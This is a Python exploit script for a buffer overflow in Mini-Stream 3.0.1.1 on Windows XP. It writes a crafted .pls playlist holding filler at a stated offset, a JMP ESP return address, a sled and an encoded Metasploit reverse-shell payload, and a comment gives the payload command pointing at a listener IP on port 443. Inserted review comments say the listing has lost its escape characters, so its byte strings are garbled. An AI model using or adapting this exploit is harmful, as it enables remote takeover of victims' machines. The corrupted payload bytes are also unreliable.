# Title : Mini-Stream Exploit for Windows XP SP2 and SP3
# Published : 2009-12-27
# Author : Ron Henry
#!/usr/bin/python
# ...:| Code Fix/Patch for WinXP - English |:...
# Referenced: http://www.exploit-db.com/exploits/10745 - mr_me
# and fixed the offset as well as tested the exploit against WinXP SP2 and SP3
# Exploit against Mini-Stream 3.0.1.1 WinXP English
# 12.27.2009
# Author: Ron Henry - rlh@ciphermonk.net - dijital1
# Version: Mini-Stream 3.0.1.1
# Downloadable from: http://mini-stream.net/
# Tested against WinXP SP2 and SP3 - English
# Flat script: builds one string (filler, a 4-character overwrite value, a short
# sled, then the encoded payload) and writes it to a .pls file in the working
# directory. There is no input handling; everything is hard-coded.
# NOTE(review): as displayed on this page the backslash escape characters are
# absent from every string literal ("x44" is three ASCII characters, not one
# byte), so the file this listing writes is plain ASCII text and does not have
# the byte layout the comments describe. Treat the listing as an extraction
# artefact rather than a runnable reproduction of the original.
outputfile="astley.pls"
# Filler run; 17403 is the offset the header comments say was corrected for
# WinXP SP2/SP3 (stated by the author, not verified here).
shellcode="x44"*17403
#shellcode+="xedx1ex94x7c" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+="x53x93x42x7e" # JMP ESP - USER32.dll Win XP SP3
# 32 printable characters; despite the comment these are letters, not 0x90
# NOP bytes.
shellcode+="CAFE"*8 # 32 Byte NOP Sled
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
# Encoded payload as produced by the command above (author's note); the same
# missing-escape caveat applies to every "xNN" token below.
shellcode+=("x89xe5xdaxd6xd9x75xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4dx59x45x50"
"x43x30x45x50x43x50x4dx59x4ax45x46x51x48x52x42"
"x44x4cx4bx50x52x50x30x4cx4bx50x52x44x4cx4cx4b"
"x50x52x45x44x4cx4bx43x42x51x38x44x4fx48x37x51"
"x5ax51x36x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx44x42x46x4cx51x30x4fx31x48x4fx44"
"x4dx43x31x4fx37x4dx32x4ax50x46x32x46x37x4cx4b"
"x51x42x42x30x4cx4bx50x42x47x4cx45x51x4ex30x4c"
"x4bx47x30x42x58x4dx55x49x50x44x34x50x4ax45x51"
"x4ex30x46x30x4cx4bx50x48x45x48x4cx4bx50x58x47"
"x50x45x51x48x53x4ax43x47x4cx47x39x4cx4bx47x44"
"x4cx4bx43x31x4ex36x46x51x4bx4fx50x31x4fx30x4e"
"x4cx4fx31x48x4fx44x4dx45x51x4fx37x46x58x4dx30"
"x44x35x4bx44x45x53x43x4dx4bx48x47x4bx43x4dx46"
"x44x42x55x4bx52x50x58x4cx4bx51x48x47x54x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx43x31x49x43x4cx4bx43x34x4cx4bx45x51x4ex30"
"x4cx49x50x44x46x44x46x44x51x4bx51x4bx45x31x46"
"x39x50x5ax50x51x4bx4fx4bx50x51x48x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4cx46x51x4dx45x38x50x33x50"
"x32x45x50x43x30x42x48x43x47x43x43x50x32x51x4f"
"x51x44x42x48x50x4cx43x47x46x46x43x37x4bx4fx48"
"x55x4ex58x4ax30x45x51x45x50x45x50x47x59x48x44"
"x46x34x46x30x43x58x47x59x4bx30x42x4bx45x50x4b"
"x4fx49x45x46x30x50x50x46x30x50x50x47x30x46x30"
"x47x30x50x50x45x38x4ax4ax44x4fx49x4fx4bx50x4b"
"x4fx48x55x4cx49x49x57x42x48x4ex4cx42x30x50x4d"
"x48x5ax42x48x45x52x45x50x45x51x4fx4bx4cx49x4d"
"x36x42x4ax44x50x50x56x51x47x43x58x4cx59x49x35"
"x42x54x45x31x4bx4fx4ex35x43x58x42x43x42x4dx42"
"x44x45x50x4cx49x4bx53x51x47x46x37x50x57x46x51"
"x4bx46x43x5ax44x52x50x59x50x56x4ax42x4bx4dx42"
"x46x4fx37x47x34x46x44x47x4cx45x51x43x31x4cx4d"
"x47x34x51x34x42x30x48x46x45x50x50x44x51x44x50"
"x50x46x36x50x56x46x36x47x36x51x46x50x4ex50x56"
"x46x36x46x33x51x46x42x48x43x49x48x4cx47x4fx4d"
"x56x4bx4fx48x55x4cx49x4dx30x50x4ex51x46x47x36"
"x4bx4fx50x30x43x58x45x58x4bx37x45x4dx45x30x4b"
"x4fx49x45x4fx4bx4cx30x4fx45x4fx52x50x56x42x48"
"x49x36x4cx55x4fx4dx4dx4dx4bx4fx4ex35x47x4cx43"
"x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43x45x45x55"
"x4fx4bx50x47x44x53x44x32x42x4fx42x4ax45x50x46"
"x33x4bx4fx4ex35x44x4ax41x41")
# File is opened in text mode ("w", not "wb") and closed explicitly rather than
# via a `with` block (Python 2-era script). The output is one very long line:
# a single repeated token followed by a long run of uppercase alphanumerics —
# a shape that content inspection of playlist files can reasonably flag.
FILE = open(outputfile, "w")
FILE.write(shellcode)
FILE.close()